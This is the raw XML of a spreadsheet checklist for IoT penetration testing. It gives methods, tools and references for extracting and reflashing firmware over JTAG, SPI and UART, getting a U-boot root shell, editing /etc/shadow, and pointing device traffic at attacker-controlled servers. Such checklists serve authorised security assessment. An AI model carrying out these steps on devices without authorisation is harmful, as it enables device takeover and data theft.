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Sagar.Jangam\Desktop\Resources\Checklists\EY-Github\Checklists-master\IOT\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{1CAFE74A-E8E4-49A5-9418-EF652DD9F859}" xr6:coauthVersionLast="44" xr6:coauthVersionMax="44" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-108" yWindow="-108" windowWidth="23256" windowHeight="12576" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="Checklist" sheetId="2" r:id="rId1"/>
    <sheet name="Checklist1" sheetId="3" r:id="rId2"/>
    <sheet name="Tools" sheetId="4" r:id="rId3"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">Checklist!$C$1:$C$102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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="983" uniqueCount="562">
  <si>
    <t>Area</t>
  </si>
  <si>
    <t>Category</t>
  </si>
  <si>
    <t>Attack</t>
  </si>
  <si>
    <t>Method</t>
  </si>
  <si>
    <t>Difficulty level</t>
  </si>
  <si>
    <t>#</t>
  </si>
  <si>
    <t>Hardware</t>
  </si>
  <si>
    <t>Wireless</t>
  </si>
  <si>
    <t>Firmware</t>
  </si>
  <si>
    <t>Cloud</t>
  </si>
  <si>
    <t>On-Board ICs</t>
  </si>
  <si>
    <t>Extract firmware</t>
  </si>
  <si>
    <t>Interact with device through shell</t>
  </si>
  <si>
    <t>Create user with custom password</t>
  </si>
  <si>
    <t>Change user password</t>
  </si>
  <si>
    <t>Kernel init bootloader attack</t>
  </si>
  <si>
    <t>Networking</t>
  </si>
  <si>
    <t>Bootloader</t>
  </si>
  <si>
    <t>Man-in-the-Middle Attack</t>
  </si>
  <si>
    <t>Sniff and replay messages</t>
  </si>
  <si>
    <t>Decrypt Zigbee messages</t>
  </si>
  <si>
    <t>Moderate</t>
  </si>
  <si>
    <t>Difficult</t>
  </si>
  <si>
    <t>Easy</t>
  </si>
  <si>
    <t>Test (Pass/Fail)</t>
  </si>
  <si>
    <t>Test outcome</t>
  </si>
  <si>
    <t>Obtain all URIs</t>
  </si>
  <si>
    <t>Communicate with device/server using URI</t>
  </si>
  <si>
    <t>NAND Glitch attack</t>
  </si>
  <si>
    <t>References</t>
  </si>
  <si>
    <t>Hardcoding</t>
  </si>
  <si>
    <t>Obtain hardcoded data (passwords, keys, etc.)</t>
  </si>
  <si>
    <t>Hardware required</t>
  </si>
  <si>
    <t>Software Required</t>
  </si>
  <si>
    <t>Local Command Execution</t>
  </si>
  <si>
    <t>Load new firmware</t>
  </si>
  <si>
    <t>Modify firmware</t>
  </si>
  <si>
    <t>Emulate firmware in local system</t>
  </si>
  <si>
    <t>Buffer overflow attacks</t>
  </si>
  <si>
    <t>Brute-force passwords</t>
  </si>
  <si>
    <t>Brute-force passwords for login prompt</t>
  </si>
  <si>
    <t>Emulation</t>
  </si>
  <si>
    <t>Modification</t>
  </si>
  <si>
    <t>Firmware - OS</t>
  </si>
  <si>
    <t>Firmware - Application</t>
  </si>
  <si>
    <t>Reverse Engineering</t>
  </si>
  <si>
    <t>Reversing</t>
  </si>
  <si>
    <t>User authentication</t>
  </si>
  <si>
    <t>Services</t>
  </si>
  <si>
    <t>Login</t>
  </si>
  <si>
    <t>Brute-force login to services such as MySQL</t>
  </si>
  <si>
    <t>Change firewall/proxy configuration to bypass their need while connecting to server</t>
  </si>
  <si>
    <t>Open ports</t>
  </si>
  <si>
    <t>Miscellaneous</t>
  </si>
  <si>
    <t>Exploit vulnerabilities on unpatched services</t>
  </si>
  <si>
    <t>Server</t>
  </si>
  <si>
    <t>Changing server IP  to attacker controlled IP</t>
  </si>
  <si>
    <t>Buying server domain, if not used</t>
  </si>
  <si>
    <t>Perform OTA with modified firmware</t>
  </si>
  <si>
    <t>Obtaining firmware during OTA</t>
  </si>
  <si>
    <t>Hashes</t>
  </si>
  <si>
    <t>Brute-force</t>
  </si>
  <si>
    <t>Device</t>
  </si>
  <si>
    <t>Add attacker's device in network by spoofing device ID</t>
  </si>
  <si>
    <t>Replay commands</t>
  </si>
  <si>
    <t>Read and clone RFID Cards</t>
  </si>
  <si>
    <t>Installation</t>
  </si>
  <si>
    <t>Keygen</t>
  </si>
  <si>
    <t>Bypass licence checks with custom keys created from understanding key algorithm used</t>
  </si>
  <si>
    <t>Debug code, modify register values</t>
  </si>
  <si>
    <t>Privilege escalation from normal to admin user</t>
  </si>
  <si>
    <t>Request &amp; Response</t>
  </si>
  <si>
    <t>Modify parameters like device ID, status during MiTM</t>
  </si>
  <si>
    <t>Mobile/Web App</t>
  </si>
  <si>
    <t>Forgot password</t>
  </si>
  <si>
    <t>Brute-force login credentials, OTP</t>
  </si>
  <si>
    <t>Bypass security checks to log in</t>
  </si>
  <si>
    <t>Commands</t>
  </si>
  <si>
    <t>Find commands which may be used to control device</t>
  </si>
  <si>
    <t>Configuration Files</t>
  </si>
  <si>
    <t>Change configuration files to change device functioning</t>
  </si>
  <si>
    <t>Find connections between ICs</t>
  </si>
  <si>
    <t>USB-UART adapter</t>
  </si>
  <si>
    <t>OWASP</t>
  </si>
  <si>
    <t>Retrieve API keys, passwords</t>
  </si>
  <si>
    <t>Debug</t>
  </si>
  <si>
    <t>Debug applications in local system</t>
  </si>
  <si>
    <t>Reconnaissance</t>
  </si>
  <si>
    <t>Look up FCC ID in fccid.io</t>
  </si>
  <si>
    <t>Sniffing</t>
  </si>
  <si>
    <t>Sniff data in network</t>
  </si>
  <si>
    <t>Enumerate GATT services, characteristics in device</t>
  </si>
  <si>
    <t>Breaking open</t>
  </si>
  <si>
    <t>Open device using screw drivers, heat, etc.</t>
  </si>
  <si>
    <t>Enclosure</t>
  </si>
  <si>
    <t>Reverse engineer firmware</t>
  </si>
  <si>
    <t>Analyze reverse engineered firmware</t>
  </si>
  <si>
    <t>Mobile App</t>
  </si>
  <si>
    <t>Data logging</t>
  </si>
  <si>
    <t>Device logging</t>
  </si>
  <si>
    <t>Analyze data stored in device by application</t>
  </si>
  <si>
    <t>Scanning</t>
  </si>
  <si>
    <t>Perform static vulnerability analysis on mobile/web app</t>
  </si>
  <si>
    <t>Perform dynamic vulnerability analysis on mobile/web app</t>
  </si>
  <si>
    <t>Replay</t>
  </si>
  <si>
    <t>Perform replay based attacks</t>
  </si>
  <si>
    <t>Thick client</t>
  </si>
  <si>
    <t>API</t>
  </si>
  <si>
    <t>Reverse engineer API calls and responses</t>
  </si>
  <si>
    <t>Find vulnerabilities like command injection, buffer overflow</t>
  </si>
  <si>
    <t>Vulnerabilities</t>
  </si>
  <si>
    <t>Identify and document ICs and their part numbers</t>
  </si>
  <si>
    <t>Applicable/Not Applicable</t>
  </si>
  <si>
    <t>Upload modified firmware</t>
  </si>
  <si>
    <t>NA</t>
  </si>
  <si>
    <t>Extract firmware from Flash memory (SPI/I2C)</t>
  </si>
  <si>
    <t>Read, write data - SPI, I2C</t>
  </si>
  <si>
    <t>Identify JTAG pins</t>
  </si>
  <si>
    <t>Identify UART pins</t>
  </si>
  <si>
    <t>Find and attack services running on open ports</t>
  </si>
  <si>
    <t>Run vulnerability scan (eg. Nessus)</t>
  </si>
  <si>
    <t>1. Go to fccid.io
2. Enter device FCC ID in search box to obtain information about device (eg. board layout, frequencies, etc.)</t>
  </si>
  <si>
    <t>1. Document part numbers of all ICs in the device, especially processor and flash memory
2. Find datasheet of ICs (esp. processor, flash memory) to understand type of ICs used (eg. SPI/I2C for flash memory); GPIO pins, serial interfaces, etc. present on the device, etc.</t>
  </si>
  <si>
    <t>1. Understand how the enclosure has been closed. Find the right tools (eg. right screw driver) to be used to open the enclosure
2. Break open enclosure by prying open with screw driver, sawing, etc.</t>
  </si>
  <si>
    <t>1. Screw driver
2. Knife</t>
  </si>
  <si>
    <t>Multimeter</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1. </t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Find 3-4 UART pins/holes</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> (either together or separate). These pins may be near the processor. GND and VCC pins may have thicker bus vias
2. </t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Identify GND</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
a. Turn OFF the device
b. Set multimeter to short-circuit check mode
c. Touch one probe of multimeter to each pin, other probe to metal shielding (eg. silver shielding over Ethernet/USB port
d. If sound is generated for any pin, that is GND pin
3. </t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Identify TX,RX and VCC ports</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
a. Turn ON the device
b. Set multimeter to 20V DC check
c. Touch one probe of multimeter to GND pin identified (or metal shielding)
d. Touch second probe of multimeter to each of other pins
e. While device is turning ON, the voltage for TX, RX and VCC will be as follows:
i. TX: Fluctuating between very low value and high value (usually 3.3V or 5V depending on device), finally stabilizing to 3.3V (or 5V)
ii. RX: Very low value (near 0)
iii. VCC: Constant high value (usually 3.3V or 5V, depending on device)</t>
    </r>
  </si>
  <si>
    <t>Sniff communication between processor and flash memory (SPI, I2C)</t>
  </si>
  <si>
    <t>Search for blogs where research has been done on this device or identical devices (eg. with similar firmware)</t>
  </si>
  <si>
    <t>Search for device firmware (current/previous/similar from same vendor) in search engines (eg. Google, Bing, etc.). Download firmware</t>
  </si>
  <si>
    <t>Previous research</t>
  </si>
  <si>
    <t>Look up current/previous firmware versions online</t>
  </si>
  <si>
    <t>Look up previous research done on device</t>
  </si>
  <si>
    <t>Debug Interface - UART</t>
  </si>
  <si>
    <t>Debug Interface - JTAG</t>
  </si>
  <si>
    <t>Communication Interface - USB</t>
  </si>
  <si>
    <t>Interaction</t>
  </si>
  <si>
    <t>Enabling</t>
  </si>
  <si>
    <t>Identification</t>
  </si>
  <si>
    <t>Firmware extraction</t>
  </si>
  <si>
    <t>Firmware upload</t>
  </si>
  <si>
    <t>Communication sniffing</t>
  </si>
  <si>
    <t>On-Board ICs - Flash memory</t>
  </si>
  <si>
    <t>Connected peripheral - GUI</t>
  </si>
  <si>
    <t>Physical Layer - 2G</t>
  </si>
  <si>
    <t>Physical Layer - Radio</t>
  </si>
  <si>
    <t>Physical Layer - Bluetooth</t>
  </si>
  <si>
    <t>Physical Layer - Zigbee</t>
  </si>
  <si>
    <t>Physical Layer - RFID</t>
  </si>
  <si>
    <t>Application Layer - MQTT</t>
  </si>
  <si>
    <t>Application Layer - CoAP</t>
  </si>
  <si>
    <t>Application Layer - CAN</t>
  </si>
  <si>
    <t>Sniff, replay</t>
  </si>
  <si>
    <t>Data retrieval</t>
  </si>
  <si>
    <t>Services, characteristics</t>
  </si>
  <si>
    <t>MiTM</t>
  </si>
  <si>
    <t>Read, clone</t>
  </si>
  <si>
    <t>Requests using URI</t>
  </si>
  <si>
    <t>FCC ID lookup</t>
  </si>
  <si>
    <t>Firmware lookup</t>
  </si>
  <si>
    <t>IC, pin identification</t>
  </si>
  <si>
    <t>Connection tracing</t>
  </si>
  <si>
    <t>Buffer Overflow attacks</t>
  </si>
  <si>
    <t>Rogue device addition</t>
  </si>
  <si>
    <t>Firewall/Proxy configuration change</t>
  </si>
  <si>
    <t>Server IP change</t>
  </si>
  <si>
    <t>Init modification</t>
  </si>
  <si>
    <t>User creation</t>
  </si>
  <si>
    <t>Password change</t>
  </si>
  <si>
    <t>Data decryption</t>
  </si>
  <si>
    <t>Server domain purchase</t>
  </si>
  <si>
    <t>Privilege escalation</t>
  </si>
  <si>
    <t>Parameter modification</t>
  </si>
  <si>
    <t>Static analysis</t>
  </si>
  <si>
    <t>Dynamic analysis</t>
  </si>
  <si>
    <t>OWASP Top 10</t>
  </si>
  <si>
    <t>Unpatched services</t>
  </si>
  <si>
    <t>Firmware analysis</t>
  </si>
  <si>
    <t>API analysis</t>
  </si>
  <si>
    <t>Attack Description</t>
  </si>
  <si>
    <t>Commands' identification</t>
  </si>
  <si>
    <t>Read, write</t>
  </si>
  <si>
    <t>URIs' identification</t>
  </si>
  <si>
    <t>1. http://www.devttys0.com/2012/11/reverse-engineering-serial-ports/
2. https://resources.infosecinstitute.com/hardware-hacking-iot-devices-offensive-iot-exploitation/#gref
3. https://jcjc-dev.com/2016/04/08/reversing-huawei-router-1-find-uart/</t>
  </si>
  <si>
    <t>https://resources.infosecinstitute.com/hardware-hacking-iot-devices-offensive-iot-exploitation/#gref</t>
  </si>
  <si>
    <t>https://fccid.io/</t>
  </si>
  <si>
    <t>1. JTAGulator or Arduino with JTAGenum
2. Multimeter</t>
  </si>
  <si>
    <t>1. https://tnp.uservoice.com/knowledgebase/articles/172101-determining-the-com-port-of-a-usb-to-serial-adapte
2. https://scribles.net/setting-up-serial-communication-between-raspberry-pi-and-pc/
3. https://software.intel.com/en-us/setting-up-serial-terminal-on-system-with-windows
4. https://www.cyberciti.biz/hardware/5-linux-unix-commands-for-connecting-to-the-serial-console/
5. https://www.acmesystems.it/minicom</t>
  </si>
  <si>
    <t xml:space="preserve">1. PuTTY or 
2. screen or 
3. minicom
</t>
  </si>
  <si>
    <t>Brute-force baud rate used by the device</t>
  </si>
  <si>
    <t>1. Connect USB-UART adapter to device's UART pins:
a. RX of USB-UART adapter to TX of device's UART
b. TX of USB-UART adapter to RX of device's UART
c. GND of USB-UART adapter to GND of device's UART
2. Turn ON the device
3. Run baudrate.py
4. Press up and down arrow keys to find the right baud rate</t>
  </si>
  <si>
    <t>baudrate.py</t>
  </si>
  <si>
    <t>1. http://konukoii.com/blog/2018/02/16/5-min-tutorial-root-via-uart/
2. https://github.com/devttys0/baudrate</t>
  </si>
  <si>
    <t>Bus Pirate</t>
  </si>
  <si>
    <t>1. https://github.com/FireFart/UARTBruteForcer
2. http://dangerousprototypes.com/blog/bus-pirate-manual/bus-pirate-uart-guide/</t>
  </si>
  <si>
    <t>1. Connect Bus Pirate to device's UART pins:
a. MISO (RX) of Bus Pirate to TX of device's UART
b. MOSI (TX) of Bus Pirate to RX of device's UART
c. GND of Bus Pirate to GND of device's UART
2. Turn ON the device
3. Run script uart.py with appropriate parameters</t>
  </si>
  <si>
    <t>1. Soldering iron
2. Soldering gun</t>
  </si>
  <si>
    <t>http://www.devttys0.com/2014/02/re-enabling-jtag-and-debugging-the-wrt120n/</t>
  </si>
  <si>
    <t>Solder jumper on disconnected jumpers to enable JTAG (if disabled)</t>
  </si>
  <si>
    <t>1. Turn OFF device
2. Find any JTAG jumpers that are disconnected from rest of system
3. Solder a little solder iron on the disconnected point to create the jumper</t>
  </si>
  <si>
    <t>Conduct tests based on OWASP Top 10, especially IDOR, XSS, SQLi, CSRF and XXE</t>
  </si>
  <si>
    <t>https://www.gracefulsecurity.com/jtagulator-introduction/
https://github.com/grandideastudio/jtagulator/issues/9
https://github.com/cyphunk/JTAGenum
https://just2secure.blogspot.com/2017/02/jtag-pin-identification.html</t>
  </si>
  <si>
    <t>1. Turn OFF device
2. Identify bus connection of JTAG pins from processor to pins or ports (holes/solder points) in the board (JTAG pins usually consist of 14 pins, though all may not be used - these pins may be together or separate). 
This may be done by conductivity test using multimeter as was done for identifying GND pin for UART (by connecting one probe of multimeter to JTAG pin and the other probe to corresponding pin of the processor)
3. If unable to identify, but have slight understanding of which pins the JTAG pins may be, use JTAGulator or Arduino with JTAGenum to identify the JTAG pins:
Turn ON device.
a. Using JTAGulator:
i. Connect JTAGulator pins with partially identified JTAG pins in board, GND pin to any GND pin on board (may be found as label)
ii. Execute following command (in Linux): minicom -D /dev/ttyUSBx -b 115200. Use PuTTY with serial connection for COMx port at baud rate 115200 for Windows
iii. Press following letters: j, h, v. Set voltage (3.3 or 5)
iv. Press i (for IDCODE scan - TDI not checked), set starting and ending channel (0, number of pins on test-1)
v. Press b (for Bypass scan), set starting and ending channel (0, number of pins on test-1)
vi. The JTAG pins will be displayed corresponding to the pins on JTAGulator
b. Using Arduino with JTAGenum
i. Flash Arduino with JTAGenum code
ii. Connect pins 2-6 to partially identified pins, GND to any GND pin on board (may be found as label)
iii. Execute following command (in Linux): minicom -D /dev/ttyUSBx -b 115200. Use PuTTY with serial connection for COMx port at baud rate 115200 for Windows
iv. Run the Arduino code
v. The JTAG pins will be displayed corresponding to the pins on Arduino</t>
  </si>
  <si>
    <t>OpenOCD</t>
  </si>
  <si>
    <t>1. Find the flash memory length holding code memory. This may be done by looking at the datasheet of the processor and seeing the start address and last address of 'Flash Memory'
2. Turn ON device
3. Connect to device through JTAG using openocd
4. Enter following commands in openocd:
a. halt
b. dump_image /tmp/flash_dump.bin start_address(eg.0x8000000) Size(Last_address-First_address eg.0x7FFFF)
c. resume
5. Firmware binary will be stored in local system at /tmp/flash_dump.bin</t>
  </si>
  <si>
    <t>1. Find the flash memory length holding code memory. This may be done by looking at the datasheet of the processor and seeing the start address and last address of 'Flash Memory'
2. Turn ON device
3. Connect to device through JTAG using openocd
4. Enter following commands in openocd:
a. halt
b. flash write_image erase /tmp/Modified_firmware.bin start_address(eg.0x8000000)
c. resume
5. Modified firmware (Modified_firmware.bin) will be uploaded into device</t>
  </si>
  <si>
    <t>https://openwrt.org/docs/guide-user/hardware/debrick.ath79.using.jtag
http://openocd.org/doc/html/Flash-Commands.html</t>
  </si>
  <si>
    <t>https://www.malwaretech.com/2015/04/hard-disk-firmware-hacking-part-2.html
https://openwrt.org/docs/guide-user/hardware/debrick.ath79.using.jtag
http://openocd.org/doc/html/General-Commands.html</t>
  </si>
  <si>
    <t xml:space="preserve">https://www.tutorialspoint.com/articles/how-to-mount-usb-drive-in-a-linux-system
</t>
  </si>
  <si>
    <t>1. Turn ON device
2. Connect to device using UART, RS232, SSH, telnet, etc.
3. Mount USB drive using following commands:
a. fdisk -l (to show usb drives attached)
b. mount /dev/sdbx /mnt (sdbx is the device name of USB drive, eg. sdb1)
4. Copy paste firmware binaries into USB using command:
cp /path/to/firmware.bin /mnt
5. Unmount USB drive using following command:
umount /dev/sdbx</t>
  </si>
  <si>
    <t>telnet
SSH</t>
  </si>
  <si>
    <t>1. Turn ON device
2. Connect to device using UART, RS232, SSH, telnet, etc.
3. Mount USB drive using following commands:
a. fdisk -l (to show usb drives attached)
b. mount /dev/sdbx /mnt (sdbx is the device name of USB drive, eg. sdb1)
4. Copy paste firmware binaries into USB using command:
cp /mnt/Modified_firmware.bin /path/to/Old_firmware.bin 
5. Unmount USB drive using following command:
umount /dev/sdbx</t>
  </si>
  <si>
    <t>flashrom
ch341eeprom</t>
  </si>
  <si>
    <t>1. Bus Pirate
2. CH341a
3. SOIC8 SOP8 test clip</t>
  </si>
  <si>
    <t>https://www.flashrom.org/Bus_Pirate
https://payatu.com/iot-security-part-4/
http://blog.isecurion.com/2017/07/06/dumping-the-firmware-from-the-device-using-buspirate/
https://www.win-raid.com/t4287f16-GUIDE-The-Beginners-Guide-to-Using-a-CH-A-SPI-Programmer-Flasher-With-Pictures.html</t>
  </si>
  <si>
    <t>1. Connect to flash memory (SPI/I2C) either directly on board, or by removing flash memory using hot air gun from board. Connection may be done using Bus Pirate with SOIC8 SOP8 test clip or with CH341a.
a. Connection wiring for bus pirate to SPI (BP-SPI): CS - CS, MISO - DO (IO1), 3V3/5V(VPU) - WP (IO2), GND - GND, MOSI - DI (IO0), CLK - CLK, 3V3/5V(VPU) - HOLD (IO3), 3V3/5V(VPU) - VCC
b. Connection wiring using CH341a programmer: The corresponding pins in the CH341a programmer may be connected to an SOIC8 clip, which is then connected to the flash memory (White dot of chip should correspond to top left pin of programmer)
The flash memory chip may be taken out and fixed into the CH341a programmer and locked as well(White dot of chip should be placed on top left)
2. Upload modified firmware using flashrom:
a. Command to flash modified firmware using Bus pirate in SPI: flashrom -p buspirate_spi:dev=/dev/device(USBx,eg. USB0),spispeed=frequency(eg. 1M) -w /path/to/Modified_firmware.bin
b. Command to flash modified firmware from SPI flash memory using CH341a programmer: sudo flashrom --programmer ch341a_spi -w /path/to/Modified_firmware.bin
Command to flash modified firmware from I2C flash memory using CH341a programmer: ch341eeprom -v -s 24cxx(size of eeprom eg.64) -w /path/to/Modified_firmware.bin
3. Modified firmware (Modified_firmware.bin) will be flashed to the flash memory</t>
  </si>
  <si>
    <t>1. Check for server domains to which the device is communicating in website hosting providers (such as GoDaddy) if they are available for purchase
2. If available for purchase, buy the domain to which the device is communicating
3. Link an online server instance (bought from online server providers such as AWS, Azure, Digital Ocean, etc.) to the domain
4. Create a web server honeypot to trace the requests coming into the remote server. Using this, we may trace the activity of the device to be tested and perform attacks based on the commands used in the request and response.</t>
  </si>
  <si>
    <t>1. Domain
2. Web server
3. Honeypot</t>
  </si>
  <si>
    <t>1. Log in to the administrative console of the cloud interface (eg. by brute-forcing admin user login or by privilege escalation from normal user to admin user through attacks such as IDOR)
2. Upload modified firmware in the option available to perform Over-The-Air firmware update</t>
  </si>
  <si>
    <t>https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEF%20CON%2025%20-%20Jesse-Michael-and-Mickey-Shkatov-Driving-Down-the-Rabbit-Hole.pdf (Use "save link as" option in Google)</t>
  </si>
  <si>
    <t>Flash memory removal</t>
  </si>
  <si>
    <t>Remove flash memory from device</t>
  </si>
  <si>
    <t>1. Solder gun
2. Solder remover
3. Hot Air Gun
4. Tweezers</t>
  </si>
  <si>
    <t>1. Use solder remover along with solder gun on the solder holding the flash memory to remove the solder
2. If solder remover step does not work, use hot air gun to remove the device using heat. Tweezers may be used to hold and remove the flash memory
3. Other techniques such as compressed air technique, pliers, chip quik, etc. (Refer 2nd link in reference)</t>
  </si>
  <si>
    <t>https://www.youtube.com/watch?v=AxYhF6Ab2CU
https://www.youtube.com/watch?v=77JgIqraX_I</t>
  </si>
  <si>
    <t>Rubber Ducky</t>
  </si>
  <si>
    <t>1. Create custom script on Rubber Ducky to test multiple PINS/passwords in the GUI console. Execute this script by connecting Rubber Ducky on the device's USB COM port or
2. Manually test multiple passwords/PINs in GUI console</t>
  </si>
  <si>
    <t>Rubber Ducky software</t>
  </si>
  <si>
    <t>https://steemit.com/usbrubberducky/@coininstant/hacking-the-samsung-galaxy-tab-with-a-usb-rubber-ducky</t>
  </si>
  <si>
    <t xml:space="preserve">If root access is available, 
1. Login to console as root
2. Change password of user using 'passwd' command:
a. passwd &lt;username&gt;
b. Enter new password
3. If passwd command does not exist, generate password hash for /etc/shadow:
a. For MD5 hash ($1):
python -c "import random,string,crypt;
randomsalt = ''.join(random.sample(string.ascii_letters,8));
print crypt.crypt('MySecretPassword', '\$1\$%s\$' % randomsalt)"
b. For SHA-256 hash ($5):
python -c "import random,string,crypt;
randomsalt = ''.join(random.sample(string.ascii_letters,8));
print crypt.crypt('MySecretPassword', '\$5\$%s\$' % randomsalt)"
c. For SHA-256 hash ($5):
python -c "import random,string,crypt;
randomsalt = ''.join(random.sample(string.ascii_letters,8));
print crypt.crypt('MySecretPassword', '\$6\$%s\$' % randomsalt)"
4. Change password hash of required user:
a. vim /etc/shadow
b. Change hash (eg. $6$snsjn...) to newly generated hash (eg. $6$ksvdks...) </t>
  </si>
  <si>
    <t>1. .https://www.computerhope.com/unix/upasswor.htm
2. https://www.shellhacks.com/linux-generate-password-hash/</t>
  </si>
  <si>
    <t>1. https://www.exploitee.rs/index.php/Alarm.com_ADC-v520IR%E2%80%8B%E2%80%8B
2. https://www.linuxtechi.com/linux-commands-to-manage-local-accounts/
3. http://linuxadministrative.blogspot.com/2014/05/adduser-command-examples.html</t>
  </si>
  <si>
    <t>Reverse engineer and find keys, passwords, commands and algorithms used</t>
  </si>
  <si>
    <t>Nessus</t>
  </si>
  <si>
    <t>1. http://www.securitylearn.net/tag/nessus-tutorial/
2. https://www.ehacking.net/2014/09/shellshock-vulnerability-scanning-nessus.html</t>
  </si>
  <si>
    <t>1. Perform advanced vulnerability scan on device IP for all plugins (you may remove DoS) and all ports (scan web applications turned ON) while on the same network (if possible, not behind any firewall)
2. Perform shellshock vulnerability scan on device IP</t>
  </si>
  <si>
    <t>1. Perform nmap scan on all ports on the device from local system, while on same network (preferably not behind firewall)
2. Check for public vulnerabilities on the services and versions of the services found open on the device
3. Perform brute-force attacks on services that request login</t>
  </si>
  <si>
    <t>1. USB-UART adapter or
2. USB-RS232 adapter</t>
  </si>
  <si>
    <t>1. Check for binaries in /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin. These are the commands which may be executed in the device
2. Check for commands being executed in the logs of the device, during connection to it from local system using UART, RS232, etc.
(Connect to device or emulate/reverse engineer firmware (as applicable) in local system for these steps)</t>
  </si>
  <si>
    <t>1. Modify main application binary through reverse engineering and modification:
a. Reverse engineer the application binary to obtain assembly-level/high-level code
b. Change server IP in application binary to attacker controlled IP
2. Change configuration files used by main application binaries:
a. vim /path/to/Configuration_file.cfg
b. Change server IP to attacker controlled IP
(Connect to device or emulate/reverse engineer firmware (as applicable) in local system for these steps)</t>
  </si>
  <si>
    <t>1. vim /path/to/Configuration_file.cfg
2. Change required configuration settings to malicious configurations
(Connect to device or emulate/reverse engineer firmware (as applicable) in local system for these steps)</t>
  </si>
  <si>
    <t>1. https://www.exploitee.rs/index.php/Alarm.com_ADC-v520IR%E2%80%8B%E2%80%8B</t>
  </si>
  <si>
    <t>https://www.exploitee.rs/index.php/Vizio_CoStar_LT_(ISV-B11)%E2%80%8B</t>
  </si>
  <si>
    <t>File access</t>
  </si>
  <si>
    <t>Create symlink to critical files in the device</t>
  </si>
  <si>
    <t>1. Connect physically to device using UART, RS232 etc.
2. During bootup, interrupt normal boot through methods such as key-press, NAND glitch attack, etc.
3. If the bootup enters into U-boot shell, enter following commands to obtain shell during normal boot:
a. printenv (eg Output: bootargs=root=/dev/mtdblock1 mem=80M console=1 rootfstype=squashfs user_debug=31)
(printenv will show the environment variables in the device. Find the boot variables from this such as bootargs, cmdline, etc. from this)
b. setenv env_parameter(eg.bootargs) print_env_parameters+init=/bin/sh(eg. root=/dev/mtdblock1 mem=80M console=1 rootfstype=squashfs user_debug=31 init=/bin/sh)
c. Reboot device using commands such as "run bootcmd" (You may try turning OFF and turning ON the device as well)</t>
  </si>
  <si>
    <t>https://tools.ietf.org/html/rfc6690
https://manpages.debian.org/stretch/libcoap-1-0-bin/coap-client.5.en.html</t>
  </si>
  <si>
    <t>https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2010/february/busybox-command-injection/</t>
  </si>
  <si>
    <t>1. Connect to flash memory (SPI/I2C) either directly on board, or by removing flash memory using hot air gun from board. Connection may be done using Bus Pirate with SOIC8 SOP8 test clip or with CH341a.
a. Connection wiring for bus pirate to SPI (BP-SPI): CS - CS, MISO - DO (IO1), 3V3/5V(VPU) - WP (IO2), GND - GND, MOSI - DI (IO0), CLK - CLK, 3V3/5V(VPU) - HOLD (IO3), 3V3/5V(VPU) - VCC
b. Connection wiring using CH341a programmer: The corresponding pins in the CH341a programmer may be connected to an SOIC8 clip, which is then connected to the flash memory (White dot of chip should correspond to top left pin of programmer)
Otherwise, the flash memory chip may be taken out and fixed into the CH341a programmer and locked (White dot of chip should be placed on top left)
2. Extract firmware using flashrom:
a. Command to extract firmware using Bus pirate in SPI: flashrom -p buspirate_spi:dev=/dev/device(USBx,eg. USB0),spispeed=frequency(eg. 1M) -r /path/to/flash_dump.bin
b. Command to extract firmware from SPI flash memory using CH341a programmer: sudo flashrom --programmer ch341a_spi -r /path/to/flash_dump.bin
Command to extract firmware from I2C flash memory using CH341a programmer: ch341eeprom -v -s 24cxx(size of eeprom eg.64) -r /path/to/flash_dump.bin
3. Dumped firmware will be saved in /path/to/flash_dump.bin</t>
  </si>
  <si>
    <t>1. Connect to flash memory (SPI/I2C) directly on board. Connection may be done using Bus Pirate with SOIC8 SOP8 test clip or with CH341a.
a. Connection wiring for bus pirate to SPI (BP-SPI): CS - CS, MISO - DO (IO1), 3V3/5V(VPU) - WP (IO2), GND - GND, MOSI - DI (IO0), CLK - CLK, 3V3/5V(VPU) - HOLD (IO3), 3V3/5V(VPU) - VCC
b. Connection wiring for bus pirate to I2C (BP -  I2C): MOSI - SDA, CLK - CLK, 3V3/5V(VPU) - VCC, GND - GND, GND - WPU
2. Connect to device using Bus Pirate using minicom/screen/PuTTY
3. Send required commands to read and write data to the flash memory:
a. SPI:
i. Enter commands to set up communication:m,5,4,1,2,1,2,2 (Change numbers if required)
ii. Put power supply ON, pull up resistors ON, AUX high: W,P (v to view pin status)
iii. Enter 0x06 for Chip Enable: 6
iv. Enter command (0x03) to read data: [3 Read_address_High(eg.0) Read_address_Low(eg.0) r:&lt;bytes_to_read(eg.2)&gt;]
v. Enter command (0x02) to write data: [2 Read_address_High(eg.0) Read_address_Low(eg.0) 0x&lt;data,eg.AA&gt; 0x&lt;data,eg.BB&gt; 0x&lt;more_data&gt;]
b. I2C:
i. Enter commands to set up communication:m,4,2,3 (Change numbers if required)
